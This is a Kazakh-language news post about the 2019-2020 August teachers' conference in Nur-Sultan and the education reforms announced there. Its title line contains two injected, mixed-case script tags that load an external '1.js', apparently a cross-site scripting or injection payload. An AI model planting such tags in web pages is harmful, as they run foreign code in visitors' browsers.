Республикалық тамыз кеңесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
2019-2020 жылғы «Білім және ғылым» тақырыбындағы тамыз конференциясы
Дәстүр бойынша жыл басында ұйымдастырылатын «Тамыз конференциясы» осы жылы Нұр-Сұлтан қаласында ұйымдастырылды. Біздің ауданымыздан ұстаздар қауымы атынан Білім бөлімінің басшысы Ә.М.Кауметов және Білім беру бөлімінің әдістемелік кабинетінің меңгерушісі Ш.Х. Ахметова ,сонымен қатар Шортанды №3 қазақ орта мектебінің география пәнінің мұғалімі А.Өнерхан, ат-аналар комитетінің мүшесі Э.Хасенова барып қатысып қайттық.
Биылғы жылғы жиылыстың ерекшелігі конференцияға ел басымыз Қасым-Жомарт Тоқаев Кемелұлы өзі келіп қатысты.
Биылғы конференция «Білім және ғылым» тақырыбында өткізілді. Конференция барысында білім мен ғылымға енгізілген жаңалықтар жайлы баяндалды. Атап айтсам:
- «Ұстаз мәртебесі» заңы осы қыркүйек айында парламентке ұсынылып 1 қаңтарға дейін қабылдануы қажет;
- «Жас мамандарға» тәлімгер ұстаздарға қосымша төлем ақы төленуі қажет;
- Ағылшын тілі 2 сыныптан бастап қана енгізілуі қажет;
- Үш тілділікке мектеп және оқушылар мен ата-аналар дайын болған жағдайда ғана мектептер біртіндеп енгізіліп отырады;
- Жаңартылған білім аясында биылғы оқу жылында 9 және 10 сыныптар енгізіледі;
Жалпы 2 сағаттай уақыт аралығында Білім және ғылым министірі Асхат Аймағамбетовтың жасаған баяндамасы барысында көптеген өзге да өзекті мәселелер қаралды.
Осы жылдан әрине тек қана жақсылықтар күтеміз.
